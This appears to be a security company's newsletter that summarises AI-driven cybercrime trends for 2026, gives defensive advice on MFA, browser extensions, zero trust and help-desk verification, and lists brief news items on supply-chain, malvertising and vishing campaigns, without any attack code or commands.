The threat landscape of 2026 has reached a definitive tipping point. We have transitioned from the era of user-ability driven hacking into what researchers call the "Fifth Wave" of cybercrime: the industrialization of the cyber offense.

According to recent investigations by Group-IB, this wave is defined by the conversion of groupings of human skills such as persuasion, impersonation, and malware development into automated, globally scalable services enabled by AI. The barrier to entry into high-level cybercrime has vanished: in today’s world, a relative beginner can deploy advanced techniques, tactics, and procedures using AI agents that write and conduct the attacks for them.

The shift is defined by four key escalations:

• Identity Kits Available Cheap: Black market "synthetic identity kits" are now a commodity thanks to mainstream AI access. For as little as $5 USD, attackers can purchase AI video actors, cloned voices, and biometric datasets designed to bypass KYC and biometric authentication.

• Agentic Phishing: Autonomous AI agents now draft bespoke lures, manage delivery, and pivot their strategy in real-time based on how your employees interact.

• Nytheon AI & Threat-Actor LLMs: Threat actors have moved beyond simple prompt injection on public tools. They are now deploying proprietary, self-hosted models like Nytheon AI, which is an 80-billion-parameter hybrid model built specifically to generate malware and disinformation without ethical restrictions.

• The "New Perimeter" Vulnerability: Attacks like DOM-Based Extension Clickjacking prove that even your previously-secure browser-local password managers can be weaponized. By hijacking the browser's Document Object Model, attackers can trick employees into exfiltrating their own vault credentials with a single click.

1. Pivot from SMS and Voice MFA as the only lock: These are less secure against AI-powered SIM swapping and vishing. Consider implementing controls such as FIDO2 security keys even as a secondary measure of 2FA.

2. Audit "Shadow AI" alongside Shadow IT: 63% of organizations lack a formal policy for internal AI usage. Without strict controls, your own employees may inadvertently cause a massive data leak.

3. Harden the Browser: Treat all extensions as privileged applications. Any plugin that injects code into the DOM (including some password managers) must be reviewed for clickjacking vulnerabilities. Consider restricting the browsers allowed to be deployed in your enterprise environment and control downloads with work-profiles and other IT management tools.

4. Zero Trust for Identity: Transition to a model where access is continuously verified based on identity, role, and real-time context. Do not rely on one-time logins in an era of synthetic identity.

5. Secure the Help Desk: Implement "On-Camera" verification for password and MFA resets. Group-IB and others note a sharp rise in "vishing" where attackers manipulate help desk staff to bypass security controls.

___________________________________________________________________________

It's an exciting time launching into 2026 with our brand new phones, laptops, and gaming consoles. But as we connect these new devices to our home networks, it's important to stay aware of the potential cyber risk. Thankfully, staying safe doesn't have to feel overly technical or stressful. This online guide walks you through easy steps to secure your devices, protect your home network, and spot warning signs of cyber threats. View the Smart Security Setup Guide

For today’s influencers and celebrities, visibility is a double-edged sword. The same content that grows your audience also expands your attack surface. Every livestream, podcast appearance, behind-the-scenes post, or branded collaboration unintentionally exposes pieces of your identity, routines, and digital life. Unlock the high-impact protections every influencer and public figure needs to know to halt—and prevent—the cyberattacks that damage careers. Read the blog

Dozens of current and former security leaders recently wrote an open letter urging recipients to avoid outdated advice, or “hacklore”, around digital risk. However, there’s one important caveat–this doesn’t necessarily apply to high-risk individuals. Join BlackCloak Cybersecurity Engineer Mike Lamberth for a discussion on why this advice is still very relevant for the high-net-worth individual to secure their digital footprint. Listen to the Podcast

A federal jury in San Francisco convicted a former Google software engineer on seven counts of economic espionage and seven counts of theft of trade secrets after the engineer exfiltrated over 2,000 pages of confidential data. Read more

In December 2025, the Notepad++ update system was compromised by suspected Chinese state-sponsored hackers in a sophisticated supply-chain attack. The attackers redirected users to malicious servers that delivered malware instead of legitimate updates. Notepad++ has since moved to a more secure hosting environment and released version 8.9.1, which includes mandatory digital signature verification for all updates to prevent future hijacks. Read more

Researchers have recently discovered a sophisticated malvertising campaign using Google Ads to target Mac users with fake "system cleaning" tools. The ads redirect victims to convincing replicas of Apple’s support site where they are tricked into pasting a malicious Base64-encoded command into their macOS Terminal. This command bypasses standard security checks to download a script that gives attackers remote control over the device, enabling them to steal sensitive files, extract SSH keys, or deploy cryptominers. Read more

In January 2026, ShinyHunters launched a widespread vishing campaign targeting hundreds of organizations. By impersonating IT support staff in live phone calls, the attackers manipulated employees into bypassing multi-factor authentication or authorizing malicious OAuth applications disguised as legitimate business tools. This aggressive strategy, which mirrors tactics used by Scattered Spider, has enabled the group to exfiltrate gigabytes of sensitive corporate and customer data. Read more